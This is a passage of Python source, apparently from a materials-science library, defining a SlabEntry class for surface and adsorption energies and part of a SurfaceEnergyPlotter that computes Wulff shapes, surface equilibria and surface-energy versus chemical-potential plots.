and value is the entry itself.\n \"\"\"\n\n def __init__(\n self,\n structure,\n energy,\n miller_index,\n correction=0.0,\n parameters=None,\n data=None,\n entry_id=None,\n label=None,\n adsorbates=None,\n clean_entry=None,\n marker=None,\n color=None,\n ):\n \"\"\"\n Make a SlabEntry containing all relevant surface thermodynamics data.\n\n Args:\n structure (Slab): The primary slab associated with this entry.\n energy (float): Energy from total energy calculation\n miller_index (tuple(h, k, l)): Miller index of plane parallel\n to surface\n correction (float): See ComputedSlabEntry\n parameters (dict): See ComputedSlabEntry\n data (dict): See ComputedSlabEntry\n entry_id (obj): See ComputedSlabEntry\n data (dict): See ComputedSlabEntry\n entry_id (str): See ComputedSlabEntry\n label (str): Any particular label for this slab, e.g. \"Tasker 2\",\n \"non-stoichiometric\", \"reconstructed\"\n adsorbates ([ComputedStructureEntry]): List of reference entries\n for the adsorbates on the slab, can be an isolated molecule\n (e.g. O2 for O or O2 adsorption), a bulk structure (eg. 
fcc\n Cu for Cu adsorption) or anything.\n clean_entry (ComputedStructureEntry): If the SlabEntry is for an\n adsorbed slab, this is the corresponding SlabEntry for the\n clean slab\n marker (str): Custom marker for gamma plots (\"--\" and \"-\" are typical)\n color (str or rgba): Custom color for gamma plots\n \"\"\"\n self.miller_index = miller_index\n self.label = label\n self.adsorbates = adsorbates if adsorbates else []\n self.clean_entry = clean_entry\n self.ads_entries_dict = {str(next(iter(ads.composition.as_dict()))): ads for ads in self.adsorbates}\n self.mark = marker\n self.color = color\n\n super().__init__(\n structure,\n energy,\n correction=correction,\n parameters=parameters,\n data=data,\n entry_id=entry_id,\n )\n\n def as_dict(self):\n \"\"\"Returns dict which contains Slab Entry data.\"\"\"\n dct = {\"@module\": type(self).__module__, \"@class\": type(self).__name__}\n dct[\"structure\"] = self.structure\n dct[\"energy\"] = self.energy\n dct[\"miller_index\"] = self.miller_index\n dct[\"label\"] = self.label\n dct[\"adsorbates\"] = self.adsorbates\n dct[\"clean_entry\"] = self.clean_entry\n\n return dct\n\n def gibbs_binding_energy(self, eads=False):\n \"\"\"\n Returns the adsorption energy or Gibbs binding energy of an adsorbate on a surface.\n\n Args:\n eads (bool): Whether to calculate the adsorption energy\n (True) or the binding energy (False) which is just\n adsorption energy normalized by number of adsorbates.\n \"\"\"\n n = self.get_unit_primitive_area\n n_ads = self.Nads_in_slab\n\n BE = (self.energy - n * self.clean_entry.energy) / n_ads - sum(ads.energy_per_atom for ads in self.adsorbates)\n return BE * n_ads if eads else BE\n\n def surface_energy(self, ucell_entry, ref_entries=None):\n \"\"\"\n Calculates the surface energy of this SlabEntry.\n\n Args:\n ucell_entry (entry): An entry object for the bulk\n ref_entries (list: [entry]): A list of entries for each type\n of element to be used as a reservoir for non-stoichiometric\n systems. The length of this list MUST be n-1 where n is the\n number of different elements in the bulk entry. 
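For a hypothetical LiCoO2 bulk, for instance, ref_entries would\n                contain elemental Li and Co entries. 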
The chempot\n of the element ref_entry that is not in the list will be\n treated as a variable.\n\n Returns (Add (Sympy class)): Surface energy\n \"\"\"\n # Set up\n ref_entries = ref_entries if ref_entries else []\n\n # Check if appropriate ref_entries are present if the slab is non-stoichiometric\n # TODO: There should be a way to identify which specific species are\n # non-stoichiometric relative to the others in systems with more than 2 species\n slab_comp = self.composition.as_dict()\n ucell_entry_comp = ucell_entry.composition.reduced_composition.as_dict()\n slab_clean_comp = Composition({el: slab_comp[el] for el in ucell_entry_comp})\n if slab_clean_comp.reduced_composition != ucell_entry.composition.reduced_composition:\n list_els = [next(iter(entry.composition.as_dict())) for entry in ref_entries]\n if not any(el in list_els for el in ucell_entry.composition.as_dict()):\n warnings.warn(\"Elemental references missing for the non-dopant species.\")\n\n gamma = (Symbol(\"E_surf\") - Symbol(\"Ebulk\")) / (2 * Symbol(\"A\"))\n ucell_comp = ucell_entry.composition\n ucell_reduced_comp = ucell_comp.reduced_composition\n ref_entries_dict = {str(next(iter(ref.composition.as_dict()))): ref for ref in ref_entries}\n ref_entries_dict.update(self.ads_entries_dict)\n\n # Calculate Gibbs free energy of the bulk per unit formula\n gibbs_bulk = ucell_entry.energy / ucell_comp.get_integer_formula_and_factor()[1]\n\n # First we get the contribution to the bulk energy\n # from each element with an existing ref_entry.\n bulk_energy, gbulk_eqn = 0, 0\n for el, ref in ref_entries_dict.items():\n N, delu = self.composition.as_dict()[el], Symbol(f\"delu_{el}\")\n if el in ucell_comp.as_dict():\n gbulk_eqn += ucell_reduced_comp[el] * (delu + ref.energy_per_atom)\n bulk_energy += N * (Symbol(\"delu_\" + el) + ref.energy_per_atom)\n\n # Next, we add the contribution to the bulk energy from\n # the variable element (the element without a ref_entry),\n # as a function of the other elements\n for ref_el in ucell_comp.as_dict():\n if str(ref_el) not in ref_entries_dict:\n break\n ref_e_per_a = (gibbs_bulk - gbulk_eqn) / ucell_reduced_comp.as_dict()[ref_el]\n bulk_energy += self.composition.as_dict()[ref_el] * ref_e_per_a\n se = gamma.subs(\n {\n Symbol(\"E_surf\"): self.energy,\n Symbol(\"Ebulk\"): bulk_energy,\n Symbol(\"A\"): self.surface_area,\n }\n )\n\n return float(se) if type(se).__name__ == \"Float\" else se\n\n @property\n def get_unit_primitive_area(self):\n \"\"\"\n Returns the surface area of the adsorbed system per\n unit area of the primitive slab system.\n \"\"\"\n A_ads = self.surface_area\n A_clean = self.clean_entry.surface_area\n return A_ads / A_clean\n\n @property\n def get_monolayer(self):\n \"\"\"\n Returns the primitive unit surface area density of the\n adsorbate.\n \"\"\"\n unit_a = self.get_unit_primitive_area\n n_surfs = self.Nsurfs_ads_in_slab\n n_ads = self.Nads_in_slab\n return n_ads / (unit_a * n_surfs)\n\n @property\n def Nads_in_slab(self):\n \"\"\"Returns the TOTAL number of adsorbates in the slab on BOTH sides.\"\"\"\n return sum(self.composition.as_dict()[a] for a in self.ads_entries_dict)\n\n @property\n def Nsurfs_ads_in_slab(self):\n \"\"\"Returns the TOTAL number of adsorbed surfaces in the slab.\"\"\"\n struct = self.structure\n weights = [s.species.weight for s in struct]\n center_of_mass = np.average(struct.frac_coords, weights=weights, axis=0)\n\n n_surfs = 0\n # Are there adsorbates on top surface?\n if any(\n site.species_string in self.ads_entries_dict for site in 
struct if site.frac_coords[2] > center_of_mass[2]\n        ):\n            n_surfs += 1\n        # Are there adsorbates on bottom surface?\n        if any(\n            site.species_string in self.ads_entries_dict for site in struct if site.frac_coords[2] < center_of_mass[2]\n        ):\n            n_surfs += 1\n\n        return n_surfs\n\n    @classmethod\n    def from_dict(cls, dct):\n        \"\"\"Returns a SlabEntry by reading in a dictionary.\"\"\"\n        structure = Structure.from_dict(dct[\"structure\"])\n        energy = dct[\"energy\"]\n        miller_index = dct[\"miller_index\"]\n        label = dct[\"label\"]\n        adsorbates = dct[\"adsorbates\"]\n        clean_entry = dct[\"clean_entry\"]\n\n        return cls(\n            structure,\n            energy,\n            miller_index,\n            label=label,\n            adsorbates=adsorbates,\n            clean_entry=clean_entry,\n        )\n\n    @property\n    def surface_area(self):\n        \"\"\"Calculates the surface area of the slab.\"\"\"\n        m = self.structure.lattice.matrix\n        return np.linalg.norm(np.cross(m[0], m[1]))\n\n    @property\n    def cleaned_up_slab(self):\n        \"\"\"Returns a slab with the adsorbates removed.\"\"\"\n        ads_strs = list(self.ads_entries_dict)\n        cleaned = self.structure.copy()\n        cleaned.remove_species(ads_strs)\n        return cleaned\n\n    @property\n    def create_slab_label(self):\n        \"\"\"Returns a label (str) for this particular slab based on composition, coverage and Miller index.\"\"\"\n        if \"label\" in self.data:\n            return self.data[\"label\"]\n\n        label = str(self.miller_index)\n        ads_strs = list(self.ads_entries_dict)\n\n        cleaned = self.cleaned_up_slab\n        label += f\" {cleaned.composition.reduced_composition}\"\n\n        if self.adsorbates:\n            for ads in ads_strs:\n                label += f\"+{ads}\"\n            label += f\", {self.get_monolayer:.3f} ML\"\n        return label\n\n    @classmethod\n    def from_computed_structure_entry(\n        cls, entry, miller_index, label=None, adsorbates=None, clean_entry=None, **kwargs\n    ):\n        \"\"\"Returns SlabEntry from a ComputedStructureEntry.\"\"\"\n        return cls(\n            entry.structure,\n            entry.energy,\n            miller_index,\n            label=label,\n            adsorbates=adsorbates,\n            clean_entry=clean_entry,\n            **kwargs,\n        )\n\n\nclass SurfaceEnergyPlotter:\n    \"\"\"\n    A class used for generating plots to analyze the thermodynamics of surfaces\n    of a material. Produces stability maps of different slab configurations,\n    phase diagrams of two parameters to determine stability of configurations\n    (future release), and Wulff shapes.\n\n    Attributes:\n        all_slab_entries (dict | list): Either a list of SlabEntry objects (note for a list, the\n            SlabEntry must have the adsorbates and clean_entry parameter plugged in) or a nested\n            dictionary containing a list of entries for slab calculations as\n            items and the corresponding Miller index of the slab as the key.\n            To account for adsorption, each value is a sub-dictionary with the\n            entry of a clean slab calculation as the sub-key and a list of\n            entries for adsorption calculations as the sub-value. The sub-value\n            can contain different adsorption configurations such as a different\n            site or a different coverage; however, ordinarily only the most stable\n            configuration for a particular coverage will be considered as the\n            function of the adsorbed surface energy has an intercept dependent on\n            the adsorption energy (i.e. an adsorption site with a higher adsorption\n            energy will always provide a higher surface energy than a site with a\n            lower adsorption energy). 
An example parameter is provided:\n {(h1,k1,l1): {clean_entry1: [ads_entry1, ads_entry2, ...], clean_entry2: [...], ...}, (h2,k2,l2): {...}}\n where clean_entry1 can be a pristine surface and clean_entry2 can be a\n reconstructed surface while ads_entry1 can be adsorption at site 1 with\n a 2x2 coverage while ads_entry2 can have a 3x3 coverage. If adsorption\n entries are present (i.e. if all_slab_entries[(h,k,l)][clean_entry1]), we\n consider adsorption in all plots and analysis for this particular facet.\n color_dict (dict): Dictionary of colors (r,g,b,a) when plotting surface energy stability.\n The keys are individual surface entries where clean surfaces have a solid color while\n the corresponding adsorbed surface will be transparent.\n ucell_entry (ComputedStructureEntry): ComputedStructureEntry of the bulk reference for\n this particular material.\n ref_entries (list): List of ComputedStructureEntries to be used for calculating chemical potential.\n facet_color_dict (dict): Randomly generated dictionary of colors associated with each facet.\n \"\"\"\n\n def __init__(self, all_slab_entries, ucell_entry, ref_entries=None):\n \"\"\"\n Object for plotting surface energy in different ways for clean and\n adsorbed surfaces.\n\n Args:\n all_slab_entries (dict or list): Dictionary or list containing\n all entries for slab calculations. See attributes.\n ucell_entry (ComputedStructureEntry): ComputedStructureEntry\n of the bulk reference for this particular material.\n ref_entries ([ComputedStructureEntries]): A list of entries for\n each type of element to be used as a reservoir for\n non-stoichiometric systems. The length of this list MUST be\n n-1 where n is the number of different elements in the bulk\n entry. The bulk energy term in the grand surface potential can\n be defined by a summation of the chemical potentials for each\n element in the system. As the bulk energy is already provided,\n one can solve for one of the chemical potentials as a function\n of the other chemical potentials and bulk energy. i.e. there\n are n-1 variables (chempots). e.g. 
if your ucell_entry is for\n LiFePO4 than your ref_entries should have an entry for Li, Fe,\n and P if you want to use the chempot of O as the variable.\n \"\"\"\n self.ucell_entry = ucell_entry\n self.ref_entries = ref_entries\n self.all_slab_entries = (\n all_slab_entries if type(all_slab_entries).__name__ == \"dict\" else entry_dict_from_list(all_slab_entries)\n )\n self.color_dict = self.color_palette_dict()\n\n se_dict, as_coeffs_dict = {}, {}\n for hkl in self.all_slab_entries:\n for clean in self.all_slab_entries[hkl]:\n se = clean.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)\n if type(se).__name__ == \"float\":\n se_dict[clean] = se\n as_coeffs_dict[clean] = {1: se}\n else:\n se_dict[clean] = se\n as_coeffs_dict[clean] = se.as_coefficients_dict()\n for dope in self.all_slab_entries[hkl][clean]:\n se = dope.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)\n if type(se).__name__ == \"float\":\n se_dict[dope] = se\n as_coeffs_dict[dope] = {1: se}\n else:\n se_dict[dope] = se\n as_coeffs_dict[dope] = se.as_coefficients_dict()\n self.surfe_dict = se_dict\n self.as_coeffs_dict = as_coeffs_dict\n\n list_of_chempots = []\n for v in self.as_coeffs_dict.values():\n if type(v).__name__ == \"float\":\n continue\n for du in v:\n if du not in list_of_chempots:\n list_of_chempots.append(du)\n self.list_of_chempots = list_of_chempots\n\n def get_stable_entry_at_u(\n self,\n miller_index,\n delu_dict=None,\n delu_default=0,\n no_doped=False,\n no_clean=False,\n ):\n \"\"\"\n Returns the entry corresponding to the most stable slab for a particular\n facet at a specific chempot. We assume that surface energy is constant\n so all free variables must be set with delu_dict, otherwise they are\n assumed to be equal to delu_default.\n\n Args:\n miller_index ((h,k,l)): The facet to find the most stable slab in\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n no_doped (bool): Consider stability of clean slabs only.\n no_clean (bool): Consider stability of doped slabs only.\n\n Returns:\n SlabEntry, surface_energy (float)\n \"\"\"\n all_delu_dict = self.set_all_variables(delu_dict, delu_default)\n\n def get_coeffs(e):\n coeffs = []\n for du in all_delu_dict:\n if type(self.as_coeffs_dict[e]).__name__ == \"float\":\n coeffs.append(self.as_coeffs_dict[e])\n elif du in self.as_coeffs_dict[e]:\n coeffs.append(self.as_coeffs_dict[e][du])\n else:\n coeffs.append(0)\n return np.array(coeffs)\n\n all_entries, all_coeffs = [], []\n for entry in self.all_slab_entries[miller_index]:\n if not no_clean:\n all_entries.append(entry)\n all_coeffs.append(get_coeffs(entry))\n if not no_doped:\n for ads_entry in self.all_slab_entries[miller_index][entry]:\n all_entries.append(ads_entry)\n all_coeffs.append(get_coeffs(ads_entry))\n\n du_vals = np.array(list(all_delu_dict.values()))\n all_gamma = list(np.dot(all_coeffs, du_vals.T))\n\n return all_entries[all_gamma.index(min(all_gamma))], float(min(all_gamma))\n\n def wulff_from_chempot(\n self,\n delu_dict=None,\n delu_default=0,\n symprec=1e-5,\n no_clean=False,\n no_doped=False,\n ):\n \"\"\"\n Method to get the Wulff shape at a specific chemical potential.\n\n Args:\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. 
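For example, passing\n                delu_dict={Symbol(\"delu_O\"): -1.65} (a hypothetical oxygen-poor\n                condition) fixes the oxygen chemical potential 1.65 eV below its\n                elemental reference. 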
Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n symprec (float): See WulffShape.\n no_doped (bool): Consider stability of clean slabs only.\n no_clean (bool): Consider stability of doped slabs only.\n\n Returns:\n WulffShape: The WulffShape at u_ref and u_ads.\n \"\"\"\n latt = SpacegroupAnalyzer(self.ucell_entry.structure).get_conventional_standard_structure().lattice\n\n miller_list = list(self.all_slab_entries)\n e_surf_list = []\n for hkl in miller_list:\n # For all configurations, calculate surface energy as a\n # function of u. Use the lowest surface energy (corresponds\n # to the most stable slab termination at that particular u)\n gamma = self.get_stable_entry_at_u(\n hkl,\n delu_dict=delu_dict,\n delu_default=delu_default,\n no_clean=no_clean,\n no_doped=no_doped,\n )[1]\n e_surf_list.append(gamma)\n\n return WulffShape(latt, miller_list, e_surf_list, symprec=symprec)\n\n def area_frac_vs_chempot_plot(\n self,\n ref_delu: Symbol,\n chempot_range: list[float],\n delu_dict: dict[Symbol, float] | None = None,\n delu_default: float = 0,\n increments: int = 10,\n no_clean: bool = False,\n no_doped: bool = False,\n ) -> plt.Axes:\n \"\"\"\n 1D plot. Plots the change in the area contribution\n of each facet as a function of chemical potential.\n\n Args:\n ref_delu (Symbol): The free variable chempot with the format:\n Symbol(\"delu_el\") where el is the name of the element.\n chempot_range (list[float]): Min/max range of chemical potential to plot along.\n delu_dict (dict[Symbol, float]): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials.\n increments (int): Number of data points between min/max or point\n of intersection. 
Defaults to 10 points.\n            no_clean (bool): Consider stability of doped/adsorbed slabs only.\n            no_doped (bool): Consider stability of clean slabs only.\n\n        Returns:\n            plt.Axes: Plot of area fraction on the Wulff shape for each facet vs chemical potential.\n        \"\"\"\n        delu_dict = delu_dict or {}\n        chempot_range = sorted(chempot_range)\n        all_chempots = np.linspace(min(chempot_range), max(chempot_range), increments)\n\n        # initialize a dictionary of lists of fractional areas for each hkl\n        hkl_area_dict: dict[tuple[int, int, int], list[float]] = {}\n        for hkl in self.all_slab_entries:\n            hkl_area_dict[hkl] = []\n\n        # Get plot points for each Miller index\n        for u in all_chempots:\n            delu_dict[ref_delu] = u\n            wulff_shape = self.wulff_from_chempot(\n                delu_dict=delu_dict,\n                no_clean=no_clean,\n                no_doped=no_doped,\n                delu_default=delu_default,\n            )\n\n            for hkl in wulff_shape.area_fraction_dict:\n                hkl_area_dict[hkl].append(wulff_shape.area_fraction_dict[hkl])\n\n        # Plot the area fraction vs chemical potential for each facet\n        ax = pretty_plot(width=8, height=7)\n\n        for hkl in self.all_slab_entries:\n            clean_entry = next(iter(self.all_slab_entries[hkl]))\n            # Ignore any facets that never show up on the\n            # Wulff shape regardless of chemical potential\n            if all(a == 0 for a in hkl_area_dict[hkl]):\n                continue\n            plt.plot(\n                all_chempots,\n                hkl_area_dict[hkl],\n                \"--\",\n                color=self.color_dict[clean_entry],\n                label=str(hkl),\n            )\n\n        # Make the figure look nice\n        ax.set(ylabel=r\"Fractional area $A^{Wulff}_{hkl}/A^{Wulff}$\")\n        self.chempot_plot_addons(\n            ax,\n            chempot_range,\n            str(ref_delu).split(\"_\")[1],\n            rect=[-0.0, 0, 0.95, 1],\n            pad=5,\n            ylim=[0, 1],\n        )\n\n        return ax\n\n    def get_surface_equilibrium(self, slab_entries, delu_dict=None):\n        \"\"\"\n        Takes in a list of SlabEntries and calculates the chemical potentials\n        at which all slabs in the list coexist simultaneously. Useful for\n        building surface phase diagrams. Note that to solve for x equations\n        (x slab_entries), there must be x free variables (chemical potentials).\n        Adjust delu_dict as needed to get the correct number of free variables.\n\n        Args:\n            slab_entries (list): The SlabEntry objects to equilibrate, one per equation.\n            delu_dict (dict): Dictionary of the chemical potentials to be set as\n                constant. 
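Each chempot fixed here removes one free\n                variable; e.g. passing {Symbol(\"delu_H\"): -0.5} (hypothetical) in a\n                two-entry system leaves delu_O and gamma to be solved for. 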
Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n\n Returns:\n array: Array containing a solution to x equations with x\n variables (x-1 chemical potential and 1 surface energy)\n \"\"\"\n # Generate all possible coefficients\n all_parameters = []\n all_eqns = []\n for slab_entry in slab_entries:\n se = self.surfe_dict[slab_entry]\n\n # remove the free chempots we wish to keep constant and\n # set the equation to 0 (subtract gamma from both sides)\n if type(se).__name__ == \"float\":\n all_eqns.append(se - Symbol(\"gamma\"))\n else:\n se = sub_chempots(se, delu_dict) if delu_dict else se\n all_eqns.append(se - Symbol(\"gamma\"))\n all_parameters.extend([p for p in list(se.free_symbols) if p not in all_parameters])\n\n all_parameters.append(Symbol(\"gamma\"))\n # Now solve the system of linear eqns to find the chempot\n # where the slabs are at equilibrium with each other\n\n soln = linsolve(all_eqns, all_parameters)\n if not soln:\n warnings.warn(\"No solution\")\n return soln\n return {p: next(iter(soln))[i] for i, p in enumerate(all_parameters)}\n\n def stable_u_range_dict(\n self,\n chempot_range,\n ref_delu,\n no_doped=True,\n no_clean=False,\n delu_dict=None,\n miller_index=(),\n dmu_at_0=False,\n return_se_dict=False,\n ):\n \"\"\"\n Creates a dictionary where each entry is a key pointing to a\n chemical potential range where the surface of that entry is stable.\n Does so by enumerating through all possible solutions (intersect)\n for surface energies of a specific facet.\n\n Args:\n chempot_range ([max_chempot, min_chempot]): Range to consider the\n stability of the slabs.\n ref_delu (sympy Symbol): The range stability of each slab is based\n on the chempot range of this chempot. Should be a sympy Symbol\n object of the format: Symbol(\"delu_el\") where el is the name of\n the element\n no_doped (bool): Consider stability of clean slabs only.\n no_clean (bool): Consider stability of doped slabs only.\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n miller_index (list): Miller index for a specific facet to get a\n dictionary for.\n dmu_at_0 (bool): If True, if the surface energies corresponding to\n the chemical potential range is between a negative and positive\n value, the value is a list of three chemical potentials with the\n one in the center corresponding a surface energy of 0. 
Uselful\n in identifying unphysical ranges of surface energies and their\n chemical potential range.\n return_se_dict (bool): Whether or not to return the corresponding\n dictionary of surface energies\n \"\"\"\n if delu_dict is None:\n delu_dict = {}\n chempot_range = sorted(chempot_range)\n stable_urange_dict, se_dict = {}, {}\n\n # Get all entries for a specific facet\n for hkl in self.all_slab_entries:\n entries_in_hkl = []\n # Skip this facet if this is not the facet we want\n if miller_index and hkl != tuple(miller_index):\n continue\n if not no_clean:\n entries_in_hkl.extend(self.all_slab_entries[hkl])\n if not no_doped:\n for entry in self.all_slab_entries[hkl]:\n entries_in_hkl.extend(self.all_slab_entries[hkl][entry])\n\n for entry in entries_in_hkl:\n stable_urange_dict[entry] = []\n se_dict[entry] = []\n # if there is only one entry for this facet, then just give it the\n # default urange, you can't make combinations with just 1 item\n if len(entries_in_hkl) == 1:\n stable_urange_dict[entries_in_hkl[0]] = chempot_range\n u1, u2 = delu_dict.copy(), delu_dict.copy()\n u1[ref_delu], u2[ref_delu] = chempot_range[0], chempot_range[1]\n se = self.as_coeffs_dict[entries_in_hkl[0]]\n se_dict[entries_in_hkl[0]] = [\n sub_chempots(se, u1),\n sub_chempots(se, u2),\n ]\n continue\n\n for pair in itertools.combinations(entries_in_hkl, 2):\n # I'm assuming ref_delu was not set in delu_dict,\n # so the solution should be for ref_delu\n solution = self.get_surface_equilibrium(pair, delu_dict=delu_dict)\n\n # Check if this solution is stable\n if not solution:\n continue\n new_delu_dict = delu_dict.copy()\n new_delu_dict[ref_delu] = solution[ref_delu]\n stable_entry, gamma = self.get_stable_entry_at_u(\n hkl, new_delu_dict, no_doped=no_doped, no_clean=no_clean\n )\n if stable_entry not in pair:\n continue\n\n # Now check if the solution is within the chempot range\n if not chempot_range[0] <= solution[ref_delu] <= chempot_range[1]:\n continue\n\n for entry in pair:\n stable_urange_dict[entry].append(solution[ref_delu])\n se_dict[entry].append(gamma)\n\n # Now check if all entries have 2 chempot values. If only\n # one, we need to set the other value as either the upper\n # limit or lower limit of the user provided chempot_range\n new_delu_dict = delu_dict.copy()\n for u in chempot_range:\n new_delu_dict[ref_delu] = u\n entry, gamma = self.get_stable_entry_at_u(\n hkl, delu_dict=new_delu_dict, no_doped=no_doped, no_clean=no_clean\n )\n stable_urange_dict[entry].append(u)\n se_dict[entry].append(gamma)\n\n if dmu_at_0:\n for entry, v in se_dict.items():\n # if se are of opposite sign, determine chempot when se=0.\n # Useful for finding a chempot range where se is unphysical\n if not stable_urange_dict[entry]:\n continue\n if v[0] * v[1] < 0:\n # solve for gamma=0\n se = self.as_coeffs_dict[entry]\n v.append(0)\n stable_urange_dict[entry].append(solve(sub_chempots(se, delu_dict), ref_delu)[0])\n\n # sort the chempot ranges for each facet\n for entry, v in stable_urange_dict.items():\n se_dict[entry] = [se for i, se in sorted(zip(v, se_dict[entry]))]\n stable_urange_dict[entry] = sorted(v)\n\n if return_se_dict:\n return stable_urange_dict, se_dict\n return stable_urange_dict\n\n def color_palette_dict(self, alpha=0.35):\n \"\"\"\n Helper function to assign each facet a unique color using a dictionary.\n\n Args:\n alpha (float): Degree of transparency\n\n return (dict): Dictionary of colors (r,g,b,a) when plotting surface\n energy stability. 
The keys are individual surface entries where\n clean surfaces have a solid color while the corresponding adsorbed\n surface will be transparent.\n \"\"\"\n color_dict = {}\n for hkl in self.all_slab_entries:\n rgb_indices = [0, 1, 2]\n color = [0, 0, 0, 1]\n random.shuffle(rgb_indices)\n for i, ind in enumerate(rgb_indices):\n if i == 2:\n break\n color[ind] = np.random.uniform(0, 1)\n\n # Get the clean (solid) colors first\n clean_list = np.linspace(0, 1, len(self.all_slab_entries[hkl]))\n for i, clean in enumerate(self.all_slab_entries[hkl]):\n c = copy.copy(color)\n c[rgb_indices[2]] = clean_list[i]\n color_dict[clean] = c\n\n # Now get the adsorbed (transparent) colors\n for ads_entry in self.all_slab_entries[hkl][clean]:\n c_ads = copy.copy(c)\n c_ads[3] = alpha\n color_dict[ads_entry] = c_ads\n\n return color_dict\n\n def chempot_vs_gamma_plot_one(\n self,\n ax: plt.Axes,\n entry: SlabEntry,\n ref_delu: Symbol,\n chempot_range: list[float],\n delu_dict: dict[Symbol, float] | None = None,\n delu_default: float = 0,\n label: str = \"\",\n JPERM2: bool = False,\n ) -> plt.Axes:\n \"\"\"\n Helper function to help plot the surface energy of a\n single SlabEntry as a function of chemical potential.\n\n Args:\n ax (plt.Axes): Matplotlib Axes instance for plotting.\n entry: Entry of the slab whose surface energy we want\n to plot. (Add appropriate description for type)\n ref_delu (Symbol): The range stability of each slab is based\n on the chempot range of this chempot.\n chempot_range (list[float]): Range to consider the stability of the slabs.\n delu_dict (dict[Symbol, float]): Dictionary of the chemical potentials.\n delu_default (float): Default value for all unset chemical potentials.\n label (str): Label of the slab for the legend.\n JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or\n eV/A^2 (False).\n\n Returns:\n plt.Axes: Plot of surface energy vs chemical potential for one entry.\n \"\"\"\n delu_dict = delu_dict or {}\n chempot_range = sorted(chempot_range)\n\n # use dashed lines for slabs that are not stoichiometric\n # wrt bulk. 
Label with formula if non-stoichiometric\n ucell_comp = self.ucell_entry.composition.reduced_composition\n if entry.adsorbates:\n s = entry.cleaned_up_slab\n clean_comp = s.composition.reduced_composition\n else:\n clean_comp = entry.composition.reduced_composition\n\n mark = \"--\" if ucell_comp != clean_comp else \"-\"\n\n delu_dict = self.set_all_variables(delu_dict, delu_default)\n delu_dict[ref_delu] = chempot_range[0] # type: ignore\n gamma_min = self.as_coeffs_dict[entry]\n gamma_min = gamma_min if type(gamma_min).__name__ == \"float\" else sub_chempots(gamma_min, delu_dict)\n delu_dict[ref_delu] = chempot_range[1] # type: ignore\n gamma_max = self.as_coeffs_dict[entry]\n gamma_max = gamma_max if type(gamma_max).__name__ == \"float\" else sub_chempots(gamma_max, delu_dict)\n gamma_range = [gamma_min, gamma_max]\n\n se_range = np.array(gamma_range) * EV_PER_ANG2_TO_JOULES_PER_M2 if JPERM2 else gamma_range\n\n mark = entry.mark if entry.mark else mark\n c = entry.color if entry.color else self.color_dict[entry]\n return plt.plot(chempot_range, se_range, mark, color=c, label=label)\n\n def chempot_vs_gamma(\n self,\n ref_delu,\n chempot_range,\n miller_index=(),\n delu_dict=None,\n delu_default=0,\n JPERM2=False,\n show_unstable=False,\n ylim=None,\n plt=None,\n no_clean=False,\n no_doped=False,\n use_entry_labels=False,\n no_label=False,\n ):\n \"\"\"\n Plots the surface energy as a function of chemical potential.\n Each facet will be associated with its own distinct colors.\n Dashed lines will represent stoichiometries different from that\n of the mpid's compound. Transparent lines indicates adsorption.\n\n Args:\n ref_delu (sympy Symbol): The range stability of each slab is based\n on the chempot range of this chempot. Should be a sympy Symbol\n object of the format: Symbol(\"delu_el\") where el is the name of\n the element\n chempot_range ([max_chempot, min_chempot]): Range to consider the\n stability of the slabs.\n miller_index (list): Miller index for a specific facet to get a\n dictionary for.\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. 
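(The chempot passed as ref_delu is the scanned variable and should be\n                left out of delu_dict.) 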
Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or\n eV/A^2 (False)\n show_unstable (bool): Whether or not to show parts of the surface\n energy plot outside the region of stability.\n ylim ([ymax, ymin]): Range of y axis\n no_doped (bool): Whether to plot for the clean slabs only.\n no_clean (bool): Whether to plot for the doped slabs only.\n use_entry_labels (bool): If True, will label each slab configuration\n according to their given label in the SlabEntry object.\n no_label (bool): Option to turn off labels.\n\n Returns:\n Plot: Plot of surface energy vs chempot for all entries.\n \"\"\"\n if delu_dict is None:\n delu_dict = {}\n chempot_range = sorted(chempot_range)\n\n plt = plt if plt else pretty_plot(width=8, height=7)\n axes = plt.gca()\n\n for hkl in self.all_slab_entries:\n if miller_index and hkl != tuple(miller_index):\n continue\n # Get the chempot range of each surface if we only\n # want to show the region where each slab is stable\n if not show_unstable:\n stable_u_range_dict = self.stable_u_range_dict(\n chempot_range, ref_delu, no_doped=no_doped, delu_dict=delu_dict, miller_index=hkl\n )\n\n already_labelled = []\n label = \"\"\n for clean_entry in self.all_slab_entries[hkl]:\n urange = stable_u_range_dict[clean_entry] if not show_unstable else chempot_range\n # Don't plot if the slab is unstable, plot if it is.\n if urange != []:\n label = clean_entry.label\n if label in already_labelled:\n label = None\n else:\n already_labelled.append(label)\n if not no_clean:\n if use_entry_labels:\n label = clean_entry.label\n if no_label:\n label = \"\"\n plt = self.chempot_vs_gamma_plot_one(\n plt,\n clean_entry,\n ref_delu,\n urange,\n delu_dict=delu_dict,\n delu_default=delu_default,\n label=label,\n JPERM2=JPERM2,\n )\n if not no_doped:\n for ads_entry in self.all_slab_entries[hkl][clean_entry]:\n # Plot the adsorbed slabs\n # Generate a label for the type of slab\n urange = stable_u_range_dict[ads_entry] if not show_unstable else chempot_range\n if urange != []:\n if use_entry_labels:\n label = ads_entry.label\n if no_label:\n label = \"\"\n plt = self.chempot_vs_gamma_plot_one(\n plt,\n ads_entry,\n ref_delu,\n urange,\n delu_dict=delu_dict,\n delu_default=delu_default,\n label=label,\n JPERM2=JPERM2,\n )\n\n # Make the figure look nice\n plt.ylabel(r\"Surface energy (J/$m^{2}$)\") if JPERM2 else plt.ylabel(r\"Surface energy (eV/$\\AA^{2}$)\")\n return 